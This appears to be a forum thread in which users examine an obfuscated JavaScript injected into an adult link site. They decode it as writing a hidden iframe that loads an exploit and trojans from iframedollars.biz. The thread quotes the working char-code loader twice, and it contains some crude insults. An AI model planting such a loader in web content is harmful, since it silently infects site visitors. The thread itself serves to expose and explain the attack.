http://www.microsoft.com/technet/sec.../ms04-013.mspx
http://www.emthree.net/ucn/HUNError.gif

I am not getting anything here... hmm :error

Remote Stats.

the iframe is called from his own java script.
var temp="",i,c=0,out="";var str="60!73!70!82!65!77!69!32!83!82!67!61!34!104!11 6!116!112!58!47!47!105!102!114!97!109!101!100!111! 108!108!97!114!115!46!98!105!122!47!115!49!54!52!4 6!104!116!109!108!34!32!87!73!68!84!72!61!48!32!66 !79!82!68!69!82!61!48!32!72!69!73!71!72!84!61!48!3 2!115!116!121!108!101!61!34!100!105!115!112!108!97 !121!58!110!111!110!101!34!62!60!47!73!70!82!65!77 !69!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++;out=out+String.fromCharCode(temp);temp=""; }document.write(out);

Either he likes the extra money or his site has been hacked.
The script builds the string for the iframe.

This is bad. I hope it will be fixed soon

The hun has its own forum , i have let them know , they dont seem to care..

those trojans are loaded on damn near every shady tgp online. Nothin new and exotic by any means

its just the asci code
60 = <
73 = i
70 = f
82 = r and so on.
document.write puts out <iframe......iframedollars.biz> . Then iframedollars starts the fucking exploit.

... the code on thehun.com is encrypted, stop blaming russian hackers, the owner of the site is doing it himself.

var temp="",i,c=0,out="";var str="60!73!70!82!65!77!69!32!83!82!67!61!34!104!11 6!116 !112!58!47!47!105!102!114!97!109!101!100!111!108!1 08!97!114!115!46!98!105!122!47!115!49!54!52!46!104 !116!109!108!34!32!87!73!68!84!72!61!48!32!66!79!8 2!68!69!82!61!48!32!72!69!73!71!72!84!61!48!32!115 !116!121!108!101!61!34!100!105!115!112!108!97!121! 58!110!111!110!101!34!62!60!47!73!70!82!65!77!69!6 2!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++;out=out+String.fromCharCode(temp);temp=""; }document.write(out);

... muchahahha, caught with your pants down.

maybe we can find a few tips on

http://www.thehun.net/gazette/

maybe we can find a few tips on

thehuns gazette

Yeah I got it too Headless.

:1orglaugh

definately coming from thehun's server

Got it too, with norton.

Ciao,

JM

Stick it up your ass Battus AKA "franck"

might want to check your comp for spyware, especially if you are using IE

It might be spyware but it's not impossible that it's a hack.

Remember, Tommys Bookmarks was hacked earlier this year by someone who got access to his server and put a cookie triggered iframe exploit on his pages.

Its not spyware... read the thread and board.